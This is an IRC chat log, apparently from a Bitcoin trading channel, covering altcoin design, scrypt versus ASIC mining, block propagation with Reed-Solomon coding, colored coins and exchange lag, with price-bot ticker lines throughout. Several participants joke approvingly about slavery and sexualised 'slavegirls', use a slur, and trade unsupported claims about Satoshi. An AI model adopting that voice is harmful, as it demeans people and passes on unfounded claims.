diablo coins too Apr 15 00:47:03 or maybe better yet yeah do that. Apr 15 00:47:05 ya srsly. can it be called something other than "Coin" Apr 15 00:47:10 hell, I think satoshi may have even asked me early on to use bitcoin Apr 15 00:47:21 either that, or someone who he asked asked me Apr 15 00:47:26 I know satoshi used multiple irc nicks Apr 15 00:47:40 one of them was Diablo-D3 Apr 15 00:47:46 lololol Apr 15 00:47:47 conspirazi Apr 15 00:47:53 YES< KAK, IM SATOSHI, YOU CAUGHT ME Apr 15 00:47:53 hahahaha Apr 15 00:48:06 seriously, you'd think I would write c++ that horrid? Apr 15 00:48:16 lol he was fishing for that so hard Apr 15 00:48:27 now, consider an alt-chain where mining can only be done with human labour. say, solving PSPACE-complete puzzles like Sokoban. Apr 15 00:48:48 [BTCTC] [COGNITIVE] 1 @ 0.13 BTC [-] Apr 15 00:48:54 o yes Apr 15 00:48:59 asciilifeform: Ive written bots that do sokoban for me on nethack Apr 15 00:49:01 i'd have my slavegirls mining naked in chains Apr 15 00:49:11 so w/e Apr 15 00:49:13 I WOULD RULE THIS COIN Apr 15 00:49:26 mircea_popescu: exactly. slavegirls don't scale quite as well as ASICs. Apr 15 00:49:37 i beg your pardon ? Apr 15 00:49:44 mircea_popescu is actually jabba the hutt Apr 15 00:49:46 here we are 4 years in all we have is ~300 asics Apr 15 00:49:49 builds his empire on slave girls Apr 15 00:49:53 get out. slavegirls scale way better. Apr 15 00:50:02 mircea_popescu: I'm rather surprised you have not built SlaveCoin yet. Apr 15 00:50:08 im lazy. Apr 15 00:50:18 that's why mpex is 1990's Apr 15 00:50:21 this is the problem with slavery, it doesn't promot innovation. Apr 15 00:50:21 :D Apr 15 00:50:48 wtb 10,000 diablocoins at gox spot price Apr 15 00:52:01 actually,. to go real fascist : Apr 15 00:52:02 [MPEX] [S.MPOE] 8380 @ 0.00068305 = 5.724 BTC [-] Apr 15 00:52:05 Diablo-D3: Satoshi's use of gnarly C++ is one of the best pieces of evidence for the "Bitcoin is an NSA black project" crackpot hypothesis. Apr 15 00:52:06 well, if btc is going to reach global GDP prices ($34k at current global GDP) then DiabloCoin should be around $1. Apr 15 00:52:14 you could have mining which consists of giving birth to specified-dna babies. Apr 15 00:52:19 asciilifeform: /me shrugs Apr 15 00:52:46 you'd have to keep a bunch of vats somewhere which'd be the blockchain Apr 15 00:53:15 but basically Apr 15 00:53:30 you know how blocks are named by a 256 bit value? Apr 15 00:53:37 I think I might go the 1024 bit value route Apr 15 00:54:06 why ? Apr 15 00:54:24 qc proof. Apr 15 00:54:51 explain it to me like i'm retarded Apr 15 00:54:56 which is usually the case anyway. Apr 15 00:54:59 okay, you know what scrypt is, right? Apr 15 00:55:11 scrypt isn't limited to what ltc is doing with it Apr 15 00:55:18 yeah Apr 15 00:55:49 cant they change that like bitcoin can to sha512 Apr 15 00:56:01 kakobrekla: they'd have to actually do it Apr 15 00:56:06 and they have no interest in doing it Apr 15 00:56:08 .... Apr 15 00:56:40 kakobrekla: I dont think they're smart enough to figure out how, honestly. Apr 15 00:56:50 like bitcoin isnt at sha512 yet cause there is no interest cause there is no need cause its making sense ? Apr 15 00:56:52 the original scrypt spec doesnt allow the sizes Im talking about Apr 15 00:56:53 all of the Bitcoin-like altchains are doomed, because the first serious guy with a semiconductor fab will own the world. SlaveCoin is the future! Apr 15 00:56:55 who's "they" Apr 15 00:57:00 mircea_popescu: the ltc devs Apr 15 00:57:11 asciilifeform there's more people owning slaves than semiconductor fabs. this is a fact. Apr 15 00:57:19 there's multiple ltc devs ?! Apr 15 00:57:24 i thought it was just the azn kid Apr 15 00:57:42 mircea_popescu: the slaves need a certain minimum IQ, for Sokoban. Apr 15 00:57:58 most slaves are smarter than average for their area. Apr 15 00:58:02 mircea_popescu: theres been other committers Apr 15 00:58:06 close enough to say plural Apr 15 00:58:10 a ok Apr 15 00:58:17 i never followed it closely Apr 15 00:58:36 anyhow, he took an off the shelf message signing scheme Apr 15 00:58:43 well Apr 15 00:58:48 a key derivation function Apr 15 00:58:56 and threw it in Apr 15 00:59:11 without really understanding how it it worked Apr 15 00:59:39 think about the endgame in the ASIC trend. eventually, only powerful industrial nations will matter in the BTC game, because they can afford to build fabs. Just a handful each, even. And we're back to the central-baking clusterfuck we see with fiat. Apr 15 00:59:51 asciilifeform: exactly Apr 15 00:59:57 asciilifeform no we're not. Apr 15 01:00:00 which is why I want something that requires off the shelf normal CPUs Apr 15 01:00:05 SlaveCoin, on the other hand, evens the playing field somewhat. Apr 15 01:00:21 no it doesn't omg. the same can be said : only the most powerful states can keep slaves etc. Apr 15 01:00:28 mircea_popescu: basically Apr 15 01:00:36 https://www.tarsnap.com/scrypt.html Apr 15 01:00:37 read that Apr 15 01:01:17 see where it says -m? Apr 15 01:01:37 ya Apr 15 01:01:40 Diablo-D3: any scheme that claims to be resistant to hardware brute-forcing which doesn't change complexity class is hollow - it just hasn't met the right hardware yet. Apr 15 01:01:41 ltc could be fixed if they used -m for difficulty. Apr 15 01:01:56 asciilifeform: no, the right hardware exists Apr 15 01:02:01 [HAVELOCK] [SDICE] 1 @ 0.427 BTC [+] Apr 15 01:02:15 like, I can buy a machine that has 1TB of memory Apr 15 01:02:15 !ticker m S.MPOE Apr 15 01:02:16 [MPEX:S.MPOE] 1D: 0.00068305 / 0.00069902 / 0.0007217 (434901 shares, 304.01 BTC), 7D: 0.00063322 / 0.00069632 / 0.000735 (2592815 shares, 1,805.44 BTC), 30D: 0.00059218 / 0.00068937 / 0.00077505 (10918510 shares, 7,526.99 BTC) Apr 15 01:02:35 asciilifeform: Im not saying I can stop asics Apr 15 01:02:41 Im saying I can make their construction very expensive Apr 15 01:02:49 Diablo-D3: a PC with 1TB of RAM will still be beaten by an ASIC connected to the same 1TB of RAM. Apr 15 01:03:00 not really Apr 15 01:03:04 scrypt is not computation hard. Apr 15 01:03:22 once you've gone past the size of your cache, the speed of scrypt is the speed of your memory. Apr 15 01:03:26 i think they should use -M anyweay Apr 15 01:03:29 -m is nonsense. Apr 15 01:03:38 er Apr 15 01:03:40 I meant -M not -m Apr 15 01:03:46 ram is easier to fab than logic Apr 15 01:03:48 lol omg i found first diablocoin bug Apr 15 01:03:55 Scrat: yes, but anyone can find it Apr 15 01:03:56 but scrat has a point Apr 15 01:03:56 mircea_popescu: hurr Apr 15 01:03:57 Diablo-D3: fine, the ASIC will have RAM on-die, running at the same clock. Apr 15 01:04:07 [BTCTC] [BTC-MINING] 1 @ 0.007 BTC [+] Apr 15 01:04:09 asciilifeform: do you realize how expensive that is? Apr 15 01:04:17 Diablo-D3: certainly Apr 15 01:04:26 I'm trying to wildly drive up the cost of ASICs Apr 15 01:04:37 this is a lost bet. Apr 15 01:04:42 it can be done Apr 15 01:04:45 the cost of making computers is nil. we're getting there. Apr 15 01:04:49 Diablo-D3: but raising the cost of attack is a loser's game. eventually someone will pony up the cost, and rule. Apr 15 01:04:53 ^ Apr 15 01:05:08 asciilifeform: yes, but do you know what the fun part is? Apr 15 01:05:09 actually raising the cost is building an advantage for the attacker. Apr 15 01:05:11 keep cost low. Apr 15 01:05:11 difficulty is linked to -M. Apr 15 01:05:17 bitcoin was a LOT stronger back when ppl cpu minded it Apr 15 01:05:20 think about what I just said. Apr 15 01:05:23 we had 100k nodes and a bunch of miners. Apr 15 01:05:31 now... not so much. 500 nodes and 5 miners. Apr 15 01:05:31 mircea_popescu: shush for a sec Apr 15 01:05:36 right now you can put the BTC world in your pocket for less than the cost of a jumbo jet. Apr 15 01:05:37 asciilifeform is thinking Apr 15 01:06:00 give up? if difficulty is linked to -M, your asics _stop working_ Apr 15 01:06:07 they run out of memory Apr 15 01:06:10 um Apr 15 01:06:21 floating -M may be a great idea. Apr 15 01:06:28 in that it ruins on-die ram designs Apr 15 01:06:36 Diablo-D3: all you need is a high-speed interconnect that lets you connect arbitrarily more of whatever the necessary resource is (RAM, hashing power, etc.) Apr 15 01:06:48 BUT! you can just make asics with 1 tb worth of ram per chip and redundant math processes which just share it. Apr 15 01:06:48 asciilifeform: yes, but people can already buy those Apr 15 01:06:59 so your asic may slow down as m goes up but that's all Apr 15 01:07:01 mircea_popescu: yes but I still eat away at that Apr 15 01:07:13 normal people can buy off the shelf hardware and do it cheaper Apr 15 01:07:22 noit for long. Apr 15 01:07:24 Im trying to make it cost ineffective for asics to win Apr 15 01:07:25 this was true of gpus too Apr 15 01:07:39 i get what you're trying but you're not ther eyet. Apr 15 01:07:40 sha256 is computational intensive Apr 15 01:07:44 it uses basically no memory Apr 15 01:07:58 scrypt uses basically no cpu, but is memory intensive Apr 15 01:08:05 the fun part in all of this is that "for every wily arse, somewhere there is a cock with threads." Eventually someone builds an optical computer operating on standing-wave physics, that pwns every new hashing function you come up with the day it comes out. Apr 15 01:08:05 isn't it true that major chip makers will get into this space as btc becomes more widespread and demand for these chipsets becomes higher? innovation will follow also? Apr 15 01:08:30 asciilifeform: of course Apr 15 01:08:38 mircea_popescu: the thing is, average people can buy ram Apr 15 01:08:43 average people CANT buy asics Apr 15 01:08:49 and asics + ram isnt a winning solution Apr 15 01:08:57 mod6 so we hope Apr 15 01:09:01 the only long-term solution is a work function that is "AI-complete." Hence SlaveCoin. Apr 15 01:09:05 why not? what if AMD comes out with ASICs in '14? Apr 15 01:09:26 the cost of an ASIC with 1TB of ram is going to be the same as a cheap CPU with 1TB of ram Apr 15 01:09:33 asciilifeform however the problem of making an ai-ciomplete pow function is ALSO kinda difficult./ Apr 15 01:09:48 its the ram thats going to be expensive, not the ASIC Apr 15 01:09:55 Diablo-D3 nah, it will be higher cause of economies of scale. Apr 15 01:10:01 cpus have a large mkt already Apr 15 01:10:07 mircea_popescu: yes, and cpus are the highest economy of scale Apr 15 01:10:23 the asics and cpus would use the same ram, and have boards just as complex Apr 15 01:10:24 mircea_popescu: here's a starting point: http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.52.41 Apr 15 01:10:32 basically your coin would be mined in datacenters. Apr 15 01:10:40 mircea_popescu: it probably would be Apr 15 01:10:43 what remains is to work it into a workable scheme for a hash chain Apr 15 01:10:58 mircea_popescu: but a lot of people have already built mining farms in their basements Apr 15 01:10:58 an "exercise for the alert reader," really. Apr 15 01:11:40 asciilifeform so are you working on this ? Apr 15 01:12:15 mircea_popescu: I might, if I lacked anything else to do. Personally I'm not sitting on a stable of slaves waiting to be Sokobanned. Apr 15 01:12:29 mircea_popescu: you, on the other hand, have plenty of motivation to try, possibly. Apr 15 01:12:30 it's the internet, easy enough to do. Apr 15 01:12:53 [MPEX] [S.MPOE] 21000 @ 0.00068305 = 14.3441 BTC [-] Apr 15 01:13:06 i don't happen to believe in making things to own. i prefer owning things other ppl make Apr 15 01:13:07 mircea_popescu: there are a great many interesting hard problems, and life is short. Apr 15 01:13:15 yeah. Apr 15 01:13:22 mircea_popescu: you made an exchange though that you now own Apr 15 01:13:27 why contradict yourself? Apr 15 01:13:47 only for lack of options Apr 15 01:13:49 hater Apr 15 01:14:11 thestringpuller: dealing in financial instruments is the most effective means of pwning people. far better than the sword. Apr 15 01:15:49 asciilifeform let me get this straight. Apr 15 01:16:02 suppose we find a liniarisation of sokoban maps, such that any arbitrary number comes to a map Apr 15 01:16:30 proof of work could be then accomplished by showing a path of solving the map in at most N steps, where n is the difficulty. Apr 15 01:16:32 [MPEX] [S.MPOE] 10750 @ 0.00068305 = 7.3428 BTC [-] Apr 15 01:16:36 did i miss something here ? Apr 15 01:17:49 litecoin-0.6.3c-linux.tar.gz — Litecoin v0.6.3c for Linux (tgz, 32/64-bit) 10.9MB · Uploaded 9 months ago Apr 15 01:17:54 is litecoin too cool for recent code or what Apr 15 01:18:18 lol Apr 15 01:19:30 if its perfect, no need to change it! trololol Apr 15 01:20:25 goat found http://porngo.at Apr 15 01:20:54 wat Apr 15 01:21:55 haha Apr 15 01:22:08 why not trade them on mpex i wonder. Apr 15 01:26:28 yeah, weird. and these are weeklies? Apr 15 01:26:45 [MPEX] [S.MPOE] 8850 @ 0.00068305 = 6.045 BTC [-] Apr 15 01:26:52 well, i guess they have up to the next forward month Apr 15 01:31:19 [MPEX] [S.MPOE] 8050 @ 0.00068412 = 5.5072 BTC [+] Apr 15 01:33:05 oh its: personname: Josh Popham Apr 15 01:36:02 lolwut ? Apr 15 01:36:43 to* Apr 15 01:36:52 haha jcpham went into the options biz ? Apr 15 01:36:55 yeah Apr 15 01:36:58 looks that way Apr 15 01:37:56 I don't think it's his Apr 15 01:38:01 fbastage made it iirc Apr 15 01:39:17 no idea who that is Apr 15 01:39:29 he's the owner of the domain: `whois porngo.at` Apr 15 01:42:03 these are only european style also. Apr 15 01:42:32 anyway, interesting Apr 15 01:43:43 ouch Apr 15 01:44:04 well... if european style end of month options go for like .4 btc per 96 call Apr 15 01:44:10 then maybe mpoe bot isn't even that overpriced atm Apr 15 01:46:31 ok so the buyer puts in the expiry time, depending if they want weekly or monthy or next forward month: "The expiration date is ________ (GMT) " Apr 15 01:46:40 but yeah, they can't exercise on their own Apr 15 01:47:29 maybe someone should take those numbers and make bids Apr 15 01:47:33 as mircea_popescu indicated Apr 15 01:48:20 mircea_popescu: btw something Im interested in Apr 15 01:48:20 i wonder if these contracts will be PGP signed by both parties? i guess someone would have to inquire further... Apr 15 01:48:33 mircea_popescu: so, blocks are going to keep getting bigger and bigger and bigger, right? Apr 15 01:49:03 I should be able to use network coding to basically torrent the new block to all my peers Apr 15 01:49:51 say, use compression to compress it as far as possible, then use some form of reed solomon error correction Apr 15 01:49:56 [MPEX] [S.MPOE] 14159 @ 0.00068412 = 9.6865 BTC [+] Apr 15 01:49:58 [MPEX] [S.MPOE] 8309 @ 0.00069018 = 5.7347 BTC [+] Apr 15 01:50:02 [MPEX] [S.MPOE] 1332 @ 0.00069049 = 0.9197 BTC [+] Apr 15 01:50:19 so I can send it out in chunks, and getting x of y chunks you can reconstruct the missing (y - x) chunks Apr 15 01:50:58 but not only that, all nodes start repeating the block BEFORE Ive sent (y- x) chunks Apr 15 01:51:21 so you compress it and get to 60% of the size, then a healthy application of reed solomon codes will give you another 40% Apr 15 01:51:31 Scrat: hah Apr 15 01:52:21 Scrat: reed solomon codes wont do that Apr 15 01:52:33 infact, lets say I need 3 blocks to reconstruct 4 Apr 15 01:52:35 if you use something fast like snappy I doubt it will go below 80-90% Apr 15 01:53:12 er, 3 reed solomon block chunks to reconstruct 4 Apr 15 01:53:26 the physical space taken up by 3 will be the size of the original Apr 15 01:53:44 so I dont get compression out of those Apr 15 01:53:54 I still don't get where it will be used Apr 15 01:54:08 it propagates the block faster Apr 15 01:54:34 wow a lot of coin just printed... Apr 15 01:54:55 I send chunk A to peer 1, that completes, then I send chunk B to peer 2 and while Im sending it to 2, peer 1 is sending A to peer n Apr 15 01:54:58 Shits getting super real Apr 15 01:55:33 and then that finishes, and I send chunk C to peer 3, and while Im doing that, peer 1 sends A to another n (where n includes 2 and 3), peer 2 sends B to n (which includes 1 and 3) Apr 15 01:55:47 blocks may become double or triple digits in size Apr 15 01:56:02 er Apr 15 01:56:06 double or triple digits of MB Apr 15 01:56:06 i still think that more intelligence in the download algorithms will trump whatever improvement you will get there Apr 15 01:56:18 Scrat: that IS the intelligence Apr 15 01:56:25 Scrat: Im actually surprised bittorrent didnt go that route Apr 15 01:56:59 it chunks torrents up and seeds sends blocks evenly to peers Apr 15 01:57:20 ie, it prioritizes chunks that have low visibility Apr 15 01:57:29 well I need to think about it but it looks as if you're gonna need to have a lot of RS redundancy to make that usable Apr 15 01:57:30 but it has a lot of shit on top to handle error correction Apr 15 01:57:38 Scrat: well, no Apr 15 01:58:23 whales be dumpin' Apr 15 01:58:30 Scrat: a properly done RS setup of n of m, the size of n chunks is going to be at least the size of the original Apr 15 01:58:50 so if I need 3 or 4 of a 128kb block, 3 RS chunks will be 128kb Apr 15 01:59:51 well at this point my brain capacity is reduced to watching kiefer sutherland on my 3rd monitor Apr 15 01:59:55 actually, lets say 192kb block, 3 chunks will be 192kb Apr 15 02:00:05 I send in total 256kb for a 192kb Apr 15 02:00:05 and we shouldn't discuss this anymore :p Apr 15 02:00:12 but get in return faster propegation rate Apr 15 02:00:36 Scrat: btw, theres another thing Apr 15 02:00:39 with RS built in Apr 15 02:00:48 people could send these over shitty wireless links Apr 15 02:01:12 bleh, like bit errors make it to the application level Apr 15 02:01:16 that's so rare Apr 15 02:01:24 as in, non-networking Apr 15 02:01:31 as in, Bitcoin Eye In the Sky Apr 15 02:02:00 btw, I probably wouldnt go the route of 3 out of 4 Apr 15 02:02:10 ditch the OS/lang idea imo and make a new coin Apr 15 02:02:12 ;;ticker Apr 15 02:02:12 BTCUSD ticker | Best bid: 89.95308, Best ask: 90.00000, Bid-ask spread: 0.04692, Last trade: 90.00000, 24 hour volume: 152496.21232257, 24 hour low: 89.25715, 24 hour high: 109.99800, 24 hour vwap: 98.94765 Apr 15 02:02:19 8 of 10 or 128 of 30 seem to be optimal route Apr 15 02:02:25 Scrat: I already shelved seaking Apr 15 02:02:32 I didnt like the direction it was going Apr 15 02:02:43 I can do those techniques in C Apr 15 02:02:47 its just more verbose Apr 15 02:03:29 oh shiz, 2 day minimum? Apr 15 02:03:40 2 days for what Apr 15 02:03:50 talking about price sorry Apr 15 02:04:05 128 out of 130 would be really interesting btw Apr 15 02:04:26 send 195kb for a 192kb block Apr 15 02:04:57 connect to 130 peers, send each one chunk Apr 15 02:05:12 entire bitcoin network replicates your block as quickly as possible Apr 15 02:05:38 well i guess it does make a bit of sense, just 2-3% of overhead for a great increase in availability Apr 15 02:05:55 the entire network could theoretically have chunk 1 by the time you finish chunk 130 Apr 15 02:06:15 [BTCTC] [LTC-MINING] 2 @ 0.25 = 0.5 BTC [-] Apr 15 02:06:31 ;;ticker Apr 15 02:06:32 BTCUSD ticker | Best bid: 88.00001, Best ask: 88.06169, Bid-ask spread: 0.06168, Last trade: 88.06169, 24 hour volume: 159387.05385511, 24 hour low: 84.88000, 24 hour high: 109.99800, 24 hour vwap: 98.39396 Apr 15 02:06:36 Diablo-D3: dude wtf Apr 15 02:06:39 BT is quite old btw and most innovations on it have to do with avoiding centralization Apr 15 02:06:49 Scrat: yes, which we have in spades Apr 15 02:06:49 get the fuck out of here with that scamcoin shit Apr 15 02:07:00 YESSIR Apr 15 02:07:02 thestringpuller: are you trolling me? Apr 15 02:07:37 sort of, why do you people always want to reinvent the wheel rather than make the wheel better? Apr 15 02:07:48 thestringpuller: this is making the wheel better Apr 15 02:07:53 haven't we all fucking learned that Unix did everything right years ago? Apr 15 02:08:02 thestringpuller: actually its funny you mention that Apr 15 02:08:03 wait the topic of the convo is still diablocoin? Apr 15 02:08:04 yet people still wanna reinvent shit Apr 15 02:08:04 no we havent Apr 15 02:08:12 otherwise WE WOULDNT HAVE FUCKING THREADS Apr 15 02:08:13 SERIOUSLY Apr 15 02:08:17 but to be fair such a scheme will in no way be a USP for a new coin Apr 15 02:08:21 WHO THE FUCK THOUGHT THREADS WAS _EVER_ SUCH A GOOD IDEA Apr 15 02:08:21 QC resistance might be Apr 15 02:08:25 Dude don't engineers started on the "threads' debate Apr 15 02:08:32 that's like arguing with a vegan about honey Apr 15 02:08:38 thestringpuller: wait, what? Apr 15 02:09:02 thestringpuller: I request a new analogy Apr 15 02:09:11 D00D threads suck, we get it. Apr 15 02:09:15 Diablo-D3: a coin with coloring built in Apr 15 02:09:24 chrome works on processes etc. Apr 15 02:09:28 Scrat: that could be interesting, but Im not entirely sure how colored coins work Apr 15 02:09:36 thestringpuller: it works on processes poorly Apr 15 02:09:41 chrome is an utter pile of shit Apr 15 02:09:51 u wut Apr 15 02:09:59 chrome is the most advanced browser by far Apr 15 02:10:07 choromium is nice too Apr 15 02:11:01 Scrat: yes, and so is safari and firefox by that measuring stick Apr 15 02:11:02 they all suck Apr 15 02:11:19 you still on lynx? Apr 15 02:11:20 they did things right from the get go Apr 15 02:11:29 proper sandboxing, isolation, JS engine Apr 15 02:11:43 anyhow Apr 15 02:11:45 we are waay waay offtopic Apr 15 02:11:47 the point Im trying to make here Apr 15 02:11:51 ;;ticker --last Apr 15 02:11:52 is Im not reinventing bitcoin Apr 15 02:11:52 86.99999 Apr 15 02:11:55 Im making it better Apr 15 02:12:10 You won't know that until it's used. Apr 15 02:12:15 We don't know anything. Apr 15 02:12:29 re: colored coin: http://www.loper-os.org/?p=988 Apr 15 02:12:32 well, Im assuming that bitcoin will eventually copy my ideas Apr 15 02:12:33 when frying a skinny fish, do to poke at it too much, this spoils the fish. Apr 15 02:12:41 (the fish is bitcoin) Apr 15 02:12:57 do not* Apr 15 02:13:12 poke at the fish :D Apr 15 02:13:59 [HAVELOCK] [SDICE] 1 @ 0.427 BTC [+] Apr 15 02:14:09 asciilifeform: huh Apr 15 02:14:11 I like that idea Apr 15 02:14:16 !l m s.dice Apr 15 02:14:17 Last trade for S.DICE on MPEX was at 0.00328066 BTC [-] Apr 15 02:14:23 but what stops me from doing that now? Apr 15 02:14:35 Diablo-D3: nothing. Apr 15 02:14:39 does anyone know where I could find data for bitcoin difficulty? Apr 15 02:15:05 exfortuna current of historic? Apr 15 02:15:11 historic Apr 15 02:15:15 exfortuna: http://bitcoin.sipa.be/ Apr 15 02:15:18 okay so wait Apr 15 02:15:20 you sign your coins Apr 15 02:15:30 and then people can coutersign your coins if you're a dick? Apr 15 02:15:47 and then people can reject coins that have too many countersignatories? Apr 15 02:16:12 Thank you, but is there a way to get raw data? I'm doing a regression analysis for an econ class Apr 15 02:16:35 exfortuna: you can calculate it from the chain Apr 15 02:16:38 Diablo-D3: more or less. but note that their signatures only count if you deliberately offered your coins for the process (to build trust.) Apr 15 02:16:57 asciilifeform: yes, but what stops me from maliciously countersigning coins Apr 15 02:17:45 Diablo-D3: the only coins you can shit on are those for which a Shitcoin bond has been issued to you. but it is true that you could do so maliciously. hence a certain amount of dirt would be seen as commonplace. Apr 15 02:17:55 but the idea is that "clean" coins would be worth more. Apr 15 02:18:02 asciilifeform: hrm Apr 15 02:18:07 exfortuna: this might do http://blockexplorer.com/q/nethash Apr 15 02:18:19 asciilifeform: it'd be interesting to have colored coins built into the system Apr 15 02:18:27 for lots of purposes Apr 15 02:18:32 like, company share trading Apr 15 02:18:37 csv, difficulty is 5th number Apr 15 02:19:04 appreciate it :) Apr 15 02:19:29 at the time I wrote that, I was not yet 100% clear on how the block chain works. But now I know that Shitcoin could ride entirely on top of Bitcoin proper. You would store the necessary data as custom transactions (the way some people encode prayers into the blockchain.) Apr 15 02:19:33 [MPEX] [S.MPOE] 6550 @ 0.00068305 = 4.474 BTC [-] Apr 15 02:19:40 asciilifeform: we'd need a limited form of this Apr 15 02:20:04 where I send a tx to the network that says "these coins are shitcoined for the following users" and then list their public keys Apr 15 02:21:08 asciilifeform: we'd need a new tx format Apr 15 02:21:16 sorry for not reading it all but have a proposal for slavecoin Apr 15 02:21:18 which isnt a big deal Apr 15 02:21:23 Diablo-D3: the idea is that a user has to sign a message with his key: "This coin can be shat on in the future, by anyone who can provide x such that F(x) = somenumber." He gives x to the bond holder(s). Apr 15 02:21:35 F is a trapdoor function. Apr 15 02:21:36 asciilifeform: well, the way I'd code it is Apr 15 02:21:54 jurov: do tell. Apr 15 02:21:59 encode a block asenglish text tobe submitted into peer-reviewed scientific journal Apr 15 02:22:25 preferably resistant to sokal attack Apr 15 02:22:50 send a tx that contains your signature like normal, but contains a list of addresses who can countersign it Apr 15 02:23:02 jurov: this just guarantees that every peer-reviewed journal will be subverted by SlaveCoiners eventually. Apr 15 02:23:36 jurov: the idea is that you need to pick a work function which remains hard even when a million people (some of whom with arbitrary pull) want it to be easy. Apr 15 02:23:40 but the countersignature can ALSO be a normal tx Apr 15 02:24:09 this is what makes this channel great Apr 15 02:24:15 Diablo-D3: exactly that. this system would ride on top of Bitcoin proper. non-Shitcoin-enabled clients would function exactly as they do now. Apr 15 02:24:26 asciilifeform: well, the thing with my idea is Apr 15 02:24:31 lets say you have tagged coins Apr 15 02:24:38 say, shares of a company Apr 15 02:25:21 I can sign a sharecoin using the scripting stuff Apr 15 02:25:45 what can you measure slave PoW on? Apr 15 02:25:49 nikes per second? Apr 15 02:25:54 pyramids per year? Apr 15 02:25:55 hmm Apr 15 02:25:57 "this coin will be send to user x if user x countersigns this tx with y dtc by block z" Apr 15 02:26:22 Scrat: see "CAPTCHA" as a (somewhat flawed) example. Apr 15 02:26:32 and the client would automatically pop up requests to do so Apr 15 02:26:59 Diablo-D3: a Shitcoin that can result in moving coins is a terrible idea. Moral hazard for bond-holders. Apr 15 02:27:13 asciilifeform: notice Im not using them for rep Apr 15 02:27:16 Diablo-D3: the wronged party needs to be able to deal damage to a scammer without benefiting himself. Apr 15 02:27:20 Im using them for atomic ownership trnasferral Apr 15 02:28:43 and then for sharecoins, I could query the client to see who owns shares Apr 15 02:29:50 Diablo-D3: AFAIK, anything where coins can move programmatically is incompatible with Bitcoin as we know it. Apr 15 02:30:04 Diablo-D3: this would have to be an alt-chain. Apr 15 02:30:07 asciilifeform: of course, this is for DiabloCoin. Apr 15 02:30:07 Diablo-D3: whyyyyy' Apr 15 02:30:16 Diablo-D3: you are wasting so much time on hypotheticals Apr 15 02:30:19 this is ridiculous Apr 15 02:30:22 go build your server farm Apr 15 02:30:33 thestringpuller: I juggle tasks. Apr 15 02:30:39 seems to use my time more efficiently Apr 15 02:30:54 thestringpuller: maybe Satoshi should have waxed his car instead of dealing in weird hypotheticals, too. Apr 15 02:30:59 i want to learn more about this. more and more and more and more and more Apr 15 02:31:16 ThickAsThieves: which "this" ? Apr 15 02:31:23 i kid Apr 15 02:31:32 would prefer the channel get back on topic Apr 15 02:31:44 idea are cool Apr 15 02:31:45 thestringpuller: Im not sure where you're getting hypotheticals though Apr 15 02:31:48 but its dominating Apr 15 02:32:18 cant we get back to oohhhing and ahhhing over gox price drop? Apr 15 02:32:32 ;;ticker Apr 15 02:32:32 BTCUSD ticker | Best bid: 87.21000, Best ask: 88.00000, Bid-ask spread: 0.79000, Last trade: 88.00000, 24 hour volume: 164007.46365407, 24 hour low: 84.88000, 24 hour high: 109.99800, 24 hour vwap: 97.85507 Apr 15 02:32:33 this chatlog. it sucked. Apr 15 02:33:23 about to hit 85 Apr 15 02:33:37 poor mtgox Apr 15 02:33:53 we'll hit $34k eventually Apr 15 02:34:08 that's what you need it to be to reach your goal? Apr 15 02:34:35 i cant stand bots Apr 15 02:34:49 I love me some bots Apr 15 02:34:52 i assume they cant be avoided Apr 15 02:34:55 copumpkin: do, its global GDP / 21 million Apr 15 02:34:57 but i cant stand them Apr 15 02:35:41 everybody says that bots/HFT are a fact of life, but what if you have to solve a Sokoban (or other AI-complete nonsense) to move a coin... Apr 15 02:36:00 the solution to hft is both simple and already implemented. Apr 15 02:36:12 whats that? Apr 15 02:36:13 however, nyse & friends are very mtgox-y Apr 15 02:36:19 ThickAsThieves minimum life for orders. Apr 15 02:36:26 you put it on the book, can't cancel it for 1 second say. Apr 15 02:36:26 ah Apr 15 02:36:32 good one Apr 15 02:36:33 asciilifeform: then it will be delegated to chinese sweatshops Apr 15 02:36:36 like captchas are Apr 15 02:36:40 i just want the market to be a market Apr 15 02:36:41 that only kills one type of robotic trading (fake orders to move the market) Apr 15 02:36:47 of people wanting the asset Apr 15 02:36:50 that's the only kind actually bad. Apr 15 02:36:52 not gaming it Apr 15 02:37:14 i guess i'm a hypocrite tho Apr 15 02:37:34 .00001 speculation is no different than 10000btc i guess.... i guess Apr 15 02:37:54 even if all trades had to "fill or kill" immediately, people will still whine about HFT and bots. Apr 15 02:38:20 its sorta like how i hate traffic cameras Apr 15 02:38:26 no representation Apr 15 02:38:34 because what they're ultimately whining about is "the race being to the swift." Apr 15 02:39:06 there's no real advantage to being quick in a game of wits. Apr 15 02:39:36 meanwhile, entrepreneurs : https://bitcointalk.org/index.php?topic=176234.msg1834958#msg1834958 Apr 15 02:41:01 >mfw trollcoin founder becomes millionaire Apr 15 02:41:06 mircea_popescu: you will eat your hat if this turns into the next google Apr 15 02:41:19 ok exfortuna you beat me to it Apr 15 02:41:31 mircea_popescu: if speed doesn't matter, why does anyone complain about "goxlag" ? Apr 15 02:41:58 (whenever I read the word "goxlag" I can't help but imagine a future Gulag for BTC users...) Apr 15 02:42:02 lol Apr 15 02:42:14 speed matters in arb Apr 15 02:42:18 different stories tho, asciilifeform. Apr 15 02:42:39 if mtgox lag was subsecond (which is HUGELY laggy for an exchange) nobody'd complain Apr 15 02:42:45 i think mp just meant that in the scheme of things, betting small in high qty is no better than big in low qty Apr 15 02:42:53 but maybe i'm putting words in his mouth Apr 15 02:43:22 if you guess right you win either way Apr 15 02:43:28 the idea is just that having a car that's 1ms faster wins you nasdaq, but on a well designed exchange having a bot that's 1ms faster wins you little if anything at all. Apr 15 02:43:29 the guy who has deterministic+fast access (say, Dr. Evil who runs Gox and controls the Lag Generator) presumably wins over those who are stuck talking to the business end of MtLag Apr 15 02:43:46 this presumption is exactly what i'm attacking. Apr 15 02:43:54 let me construct an analogy here. Apr 15 02:44:08 romania is one of the eu members. it has always been a laggard. this was always decried as a huge disadvantage. Apr 15 02:44:08 includes a whore, go Apr 15 02:44:21 now europe is going off a cliff, and the laggard is in the best position all things considering. Apr 15 02:44:30 being very fast is not per se an advantage. Apr 15 02:44:48 ok, maybe lag only works to Dr. Evil's advantage if he uses it as a nice padded box in which to hide front-running. Apr 15 02:44:53 executing very well is an advantage if you have a good strat. if you have a bad strat executing poorly is actually better Apr 15 02:45:01 this is how bureaucracies survive : clueless but at least slow. Apr 15 02:45:12 i dont think either of your perspectives is totally relavant Apr 15 02:45:26 possibly not. i think we're discussing very slightly different things Apr 15 02:45:46 I suspect, but cannot prove, that the people making the real money on BTC regardless of ups/downs are front-running exchanges. Apr 15 02:45:56 this is not true. 